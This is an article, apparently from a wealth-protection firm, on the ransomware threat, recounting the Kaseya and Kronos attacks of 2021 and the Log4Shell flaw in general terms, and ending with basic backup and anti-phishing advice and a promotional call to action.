The Growing Threat of Ransomware
We first warned readers of the dangers of ransomware in 2007, comparing it to the kidnapping of your data.
Today, ransomware isn’t just a tech problem—it’s a direct threat to your financial security and personal privacy. As part of a broader strategy for wealth protection, it’s crucial to understand how ransomware can be used to extort, disrupt, and destroy your most valuable digital assets.
What Happens During a Ransomware Attack?
If you’ve been a victim of a ransomware attack, you’ll notice your system is much slower than usual. One victim called it “molasses in January.” Next, you’ll see text files appear on your desktop or in the “My Documents” folder. They’re usually entitled “README.TXT” or something similar.
The message will say something like:
“Hello, your files are now securely encrypted using an unbreakable 4096-bit algorithm. If you try to decrypt them, they will be automatically wiped. The only way to decrypt them and avoid their destruction is to purchase our decryption key. The price is 1 BTC. To make payment arrangements, send an email message to .”
Ransomware Attacks on the Rise
Since 2007, though, there’s been an explosion in documented ransomware attacks. They’ve caused the most damage to organizations that provide software or networking as a service.
One high-profile attack in July 2021 was carried out by a Russian-based hacker group calling itself REvil. They targeted Kaseya, Ltd., a managed service provider (MSP) that helps its customers maintain their IT infrastructure and end-user systems.
The hackers focused on a Kaseya tool called VSA. It is used by at least 1,500 businesses and government agencies worldwide to manage digital services for their clients. REvil then encrypted the files of approximately 1,000 of their customers and demanded a ransom payment from each of them. The total ransom REvil received isn’t known. But the criminal gang demanded anywhere from a few thousand dollars to $5 million or more per victim to unlock their files.
But an attack discovered earlier in December 2021 dwarfs the Kaseya incursion. It targeted a company called Kronos, which offers “workforce management and human capital management solutions.” Those solutions include scheduling, timekeeping, and payroll products called UKC Workforce Central, UKG TeleStaff, Banking Scheduling Solutions, and UKG Healthcare Extensions.
The Kronos Attack: A Case Study
On December 11, 2021, Kronos advised its customers of a ‘cyber security incident’ that disrupted the Kronos Private Cloud. Their customers include major organizations like Tesla, the PUMA Group, the University of Illinois Health System, Kansas State University, the City of Cleveland, and the New York Metropolitan Transportation Authority. This disruption affected the networking system used to deploy scheduling, timekeeping, and payroll products.
The Financial and Legal Impact of Ransomware
The ramifications of such an attack extend beyond the immediate disruption. Consider the financial and legal consequences. If sensitive employee data—like names, addresses, social security numbers, and employee IDs—has been compromised, the liability could be immense. In addition to potential lawsuits, there’s also the risk of significant fines from regulatory bodies. Given the significant financial and legal risks, implementing effective ransomware protection strategies is more critical than ever.
Kronos then made a startling admission and recommendation:
“Given that it may take up to several weeks to restore system availability, we strongly recommend that you evaluate and implement alternative business continuity protocols related to the affected UKG solutions.”
In communications with individual clients, Kronos acknowledged that the attack “may have compromised employee information like names, addresses, social security numbers, and employee IDs.”
We have been in touch with one of the affected organizations—an institution with several thousand employees. Its chief technology officer acknowledges that for the moment, there is no way to track vacation time or sick time accrued. He also warned that the organization might not be able to provide timely tax forms for employees to file with their tax returns. He added, the organization’s IT is “scouring the internet looking for reports of lost employee data.” And “if we find any evidence that personal information has been compromised, we will share that information with employees.”
An employee of this institution I spoke to about the attack summarized the situation as a “sh*tshow.” He referred to the need to complete a “payroll adjustment form” to reflect holiday and overtime pay. Also, his manager had warned him it could be “months” before the payroll system was functioning normally.
How Did the Attack Happen?
It’s unclear how Kronos’ servers were infiltrated. Hackers typically spread ransomware by hiding malicious files in emails and phishing targeted individuals. But it’s possible that the hackers who targeted Kronos used a newly discovered vulnerability nicknamed “log4Shell.” The flaw is in a product called the Apache logging library, which is part of some of the world’s most widely used applications and services. Successfully using this vulnerability can give an attacker full control of any targeted system.
Hackers using log4Shell as an attack vector don’t need anyone to click on a poisoned link; they only need to get the target system to log a short piece of code. Hackers can infect a system by sending the code in an email message or setting it as an account username.
Apache released an upgrade to repair the flaw on December 17, 2021. Companies worldwide rushed to incorporate it into their security architecture. Among the companies affected are Amazon Web Services, Microsoft, Cisco, Google Cloud, and IBM. The head of the US Cybersecurity and Infrastructure Security Agency referred to the vulnerability as “one of the most serious I’ve seen in my entire career, if not the most serious.”
Ransomware Protection Strategies: Taking Action
So, how can you protect yourself from ransomware and its potentially devastating effects? Here are some actionable steps you can take to safeguard your assets:
-
Back up your data daily and keep those backups offline. For individuals, an encrypted flash drive is ideal. Businesses should use tape backups that are stored offline, away from any network.
-
Never respond to emails suggesting software running on your system needs to be updated. Almost any legitimate update will announce itself within the program to be updated, not in an email.
-
Periodically test your backups and have a step-by-step plan for restoring critical network systems. That way, if your PC, smartphone, or network is ever infected with ransomware, you’ll be ready.
Develop a Comprehensive Cybersecurity Strategy
Beyond these steps, we must add ransomware protection strategies to a wider cybersecurity plan. These include conducting regular security audits, providing employee training on recognizing phishing attempts, and collaborating with cybersecurity professionals to strengthen your defenses.
Stay Proactive: Have a Plan B
Lastly, always have a Plan B. Whether it’s having alternative systems ready to go, keeping physical copies of critical documents, or considering cyber insurance to mitigate potential losses, being prepared for the worst is key. Remember, the goal isn’t just to survive a ransomware attack, but to emerge from it with minimal disruption to your life and business.
By staying vigilant and implementing these ransomware protection strategies, you can significantly reduce your risk and protect what matters most—your assets, privacy, and peace of mind.
Need Help?
Since 1984, we’ve helped more than 15,000 customers and clients protect their wealth using proven, low-risk domestic and offshore planning. To see if our planning is right for you, please book in a free no-obligation call with one of our Associates. You can do that here.
